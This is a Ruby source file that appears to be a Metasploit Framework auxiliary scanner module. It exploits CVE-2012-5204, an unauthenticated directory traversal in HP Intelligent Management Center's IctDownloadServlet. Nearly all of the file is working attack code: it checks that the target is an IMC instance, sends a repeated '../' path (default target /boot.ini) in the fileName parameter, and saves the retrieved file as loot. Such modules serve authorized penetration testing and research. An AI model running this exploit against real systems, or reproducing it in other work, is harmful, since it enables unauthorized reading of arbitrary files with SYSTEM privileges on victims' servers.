metasploit-framework/modules/auxiliary/scanner/http/hp_imc_ictdownloadservlet_t...

101 lines
2.8 KiB
Ruby
Raw Normal View History

2013-04-02 22:24:11 +00:00
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##
require 'msf/core'
class Metasploit3 < Msf::Auxiliary
include Msf::Exploit::Remote::HttpClient
include Msf::Auxiliary::Report
include Msf::Auxiliary::Scanner
def initialize(info = {})
super(update_info(info,
'Name' => 'HP Intelligent Management IctDownloadServlet Directory Traversal',
'Description' => %q{
This module exploits a lack of authentication and a directory traversal in HP
Intelligent Management, specifically in the IctDownloadServlet, in order to
retrieve arbitrary files with SYSTEM privileges. This module has been tested
2013-04-02 22:29:38 +00:00
successfully on HP Intelligent Management Center 5.1 E0202 over Windows 2003 SP2.
2013-04-02 22:24:11 +00:00
},
'License' => MSF_LICENSE,
'Author' =>
[
'rgod <rgod[at]autistici.org>', # Vulnerability Discovery
'juan vazquez' # Metasploit module
],
'References' =>
[
[ 'CVE', '2012-5204' ],
[ 'OSVDB', '91029' ],
[ 'BID', '58676' ],
[ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-13-053/' ]
]
))
register_options(
[
Opt::RPORT(8080),
OptString.new('TARGETURI', [true, 'Path to HP Intelligent Management Center', '/imc']),
OptString.new('FILEPATH', [true, 'The name of the file to download', '/boot.ini']),
# By default files downloaded from C:\Program Files\iMC\client\web\apps\imc\tmp\
OptInt.new('DEPTH', [true, 'Traversal depth if absolute is set to false', 7])
], self.class)
end
def is_imc?
res = send_request_cgi({
'uri' => normalize_uri(target_uri.path.to_s, "login.jsf"),
'method' => 'GET'
})
if res and res.code == 200 and res.body =~ /HP Intelligent Management Center/
return true
else
return false
end
end
def run_host(ip)
if not is_imc?
vprint_error("#{rhost}:#{rport} - This isn't a HP Intelligent Management Center")
return
end
travs = ""
travs << "../" * datastore['DEPTH']
travs << datastore['FILEPATH']
vprint_status("#{rhost}:#{rport} - Sending request...")
res = send_request_cgi({
'uri' => normalize_uri(target_uri.path.to_s, "tmp", "ict", "download"),
'method' => 'GET',
'vars_get' =>
{
'fileName' => travs
}
})
if res and res.code == 200 and res.headers['Content-Type'] and res.headers['Content-Type'] == "application/doc"
contents = res.body
fname = File.basename(datastore['FILEPATH'])
path = store_loot(
'hp.imc.faultdownloadservlet',
'application/octet-stream',
ip,
contents,
fname
)
print_good("#{rhost}:#{rport} - File saved in: #{path}")
else
vprint_error("#{rhost}:#{rport} - Failed to retrieve file")
return
end
end
end